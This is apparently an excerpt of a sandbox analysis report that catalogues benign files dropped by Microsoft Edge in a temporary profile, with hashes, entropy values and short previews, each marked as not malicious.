                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5559635235158827
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                                              MD5:9AAAE8C040B616D1378F3E0E17689A29
                                                                                                                                                                                                                                                                                                              SHA1:F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
                                                                                                                                                                                                                                                                                                              SHA-256:5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
                                                                                                                                                                                                                                                                                                              SHA-512:436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2629097520179995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7273991737283296
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f...............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):267
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.235018122493502
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.672 1b48 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage since it was missing..2024/12/22-17:54:53.714 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.473726825238924
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.On.!................database_metadata.1
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139094133280858
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaX0Rq1923fQyS/TUh2gr52KLlmaH+q2P923fQyS/TUh2ghZIFUv:30xHhHJL2v4HhHh2FUv
                                                                                                                                                                                                                                                                                                              MD5:25403ACAE52A047A11BF1533B67C92BC
                                                                                                                                                                                                                                                                                                              SHA1:6E17A73A0FF1FAB30AEBFA71E86FB97450B5163C
                                                                                                                                                                                                                                                                                                              SHA-256:0351489086279DBFE2F6C0910C340FA7944937F1488845E57C569D751B03BCDC
                                                                                                                                                                                                                                                                                                              SHA-512:CFAC66E7FE49F5A87D4AB29CF3C29696110EC449EC28F0D5AEDF99A77C2DBC48EE5ACF53719AB37F324176D9786EC66F98BF4FE0764F2143B043E49000B6A10A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.772 1818 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database since it was missing..2024/12/22-17:54:52.794 1818 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Site Characteristics Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):46
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.019797536844534
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                                                                                                                                                                              MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                                                                                                                                                                              SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                                                                                                                                                                              SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                                                                                                                                                                              SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...n'................_mts_schema_descriptor...
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):271
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.248921083092221
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kad0Rq1923fQyS/Zx2KLlmakXnt+q2P923fQyS/RIFUv:90x0VLMXnov47FUv
                                                                                                                                                                                                                                                                                                              MD5:237424CD5B717F3492C3C58382CD0D46
                                                                                                                                                                                                                                                                                                              SHA1:A2E37C6E51B3147BD7051E7A969318C9731D6C9E
                                                                                                                                                                                                                                                                                                              SHA-256:40F01612A84B96D3DE3A280A15EB06542106037E73BFF5E48679A6E6C014D574
                                                                                                                                                                                                                                                                                                              SHA-512:9B1100D345A349DD31D8E9ADB72C6F43B2479255EC7633C39BD99BAC0081BC85DAE340C931D85FA094EB1C2CE31DA626D2444B67AC35057807C5751834F0AE4F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.716 1818 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB since it was missing..2024/12/22-17:54:52.762 1818 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3528485475628876
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                                                                                                                                                                                              MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                                                                                                                                                                                              SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                                                                                                                                                                                              SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                                                                                                                                                                                              SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.002110589502647469
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:ImtVit:IiVi
                                                                                                                                                                                                                                                                                                              MD5:F0064E56FEAF6D8262CE8B5686F1A753
                                                                                                                                                                                                                                                                                                              SHA1:5A5FCA1C190C0B58FCF5870750113979A1A4313A
                                                                                                                                                                                                                                                                                                              SHA-256:515E31B3501EFE787ABB46DEE6E767621068078D327943344A432DD3B40A4E82
                                                                                                                                                                                                                                                                                                              SHA-512:6F296B0638D318853080AA52BEBC48AAF022755E714A0F6D258F7D0865D640442E206F833D2A0733FAA58E3FDEA2E587EF9D5D6430191D4B64EE8277443D0631
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):178176
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9401384989520177
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Qrb2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:Q/2qOB1nxCkvSAELyKOMq+c
                                                                                                                                                                                                                                                                                                              MD5:6817EEA7CE56E1AB1ECF93C090727E0F
                                                                                                                                                                                                                                                                                                              SHA1:49A10B3D157FB49768284F68335CC7B378FB13B4
                                                                                                                                                                                                                                                                                                              SHA-256:FF7B98237D2FA7537470A573B9FD12D9C656EDACC0949AA12B75970528F650CD
                                                                                                                                                                                                                                                                                                              SHA-512:6E14A0B0A47B493493F6C0C8C2A15028C0C1D53E247D1FB2D227DC772ACFB6ADF2B74CBC8FB223156A1D39A1295FFF7EC054E9BE51DBF7BCE61CC597510C4EAE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2568
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:btEl1lOtlxn:m0
                                                                                                                                                                                                                                                                                                              MD5:F7A071AB3C3C994F587069237D44CFE9
                                                                                                                                                                                                                                                                                                              SHA1:EF2EE7A5FA0D4574AE9F259995BAA1923C214A55
                                                                                                                                                                                                                                                                                                              SHA-256:2AEA20F0DEA59C5A1B889BA21B9023A3DB8BB5D17049D9F6D05D9AE9E33CE53C
                                                                                                                                                                                                                                                                                                              SHA-512:45F04DA4CAB6D1178378C9FFDE978F145DA929E2817273815F0A167144C5810B9A8DD269D21D3A1EDEF0AB82F73E962220A833588240F4E294FBCA8C9A810AF9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):11417
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.237554345326078
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                                                                                                                                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                                                                                                                                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                                                                                                                                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                                                                                                                                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                                                                                                                                                                                              Malicious:false
